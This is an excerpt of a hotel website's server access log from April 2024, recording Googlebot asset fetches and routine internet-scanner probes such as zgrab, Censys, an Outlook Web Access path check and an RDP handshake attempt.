66.249.68.3 - - [15/Apr/2024:23:44:23 +0000] "GET /assets/js/imagesloaded-pkgd.js HTTP/1.1" 200 1834 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:24 +0000] "GET /assets/js/slick.js HTTP/1.1" 200 11330 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:24 +0000] "GET /assets/js/ajax-form.js HTTP/1.1" 200 527 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.3 - - [15/Apr/2024:23:44:25 +0000] "GET /assets/js/wow.min.js HTTP/1.1" 200 2848 "https://htc.triohotels.in/dining.php" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.94 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.199.94.11 - - [15/Apr/2024:23:50:55 +0000] "GET /owa/auth/logon.aspx HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
162.243.128.30 - - [16/Apr/2024:00:00:30 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 zgrab/0.x"
167.94.138.2 - - [16/Apr/2024:00:05:39 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [16/Apr/2024:00:05:40 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
185.191.126.213 - - [16/Apr/2024:00:11:11 +0000] "GET / HTTP/1.1" 400 255 "-" "-"
172.104.210.105 - - [16/Apr/2024:00:27:58 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.34 - - [16/Apr/2024:00:32:14 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.2 - - [16/Apr/2024:00:35:38 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [16/Apr/2024:00:35:39 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
206.168.34.186 - - [16/Apr/2024:00:38:57 +0000] "GET / HTTP/1.1" 200 5069 "-" "-"
206.168.34.186 - - [16/Apr/2024:00:39:02 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
199.45.154.20 - - [16/Apr/2024:00:56:37 +0000] "GET / HTTP/1.1" 200 5069 "-" "-"
199.45.154.20 - - [16/Apr/2024:00:56:50 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
45.79.181.104 - - [16/Apr/2024:00:59:52 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.138.2 - - [16/Apr/2024:01:05:37 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.2 - - [16/Apr/2024:01:05:38 +0000] "PRI * HTTP/2.0" 400 157 "-" "-"
69.164.217.245 - - [16/Apr/2024:01:11:24 +0000] "GET / HTTP/1.1" 400 255 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.34 - - [16/Apr/2024:01:13:00 +0000] "GET / HTTP/1.1" 200 1971 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
80.66.88.215 - - [16/Apr/2024:01:24:11 +0000] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 157 "-" "-"
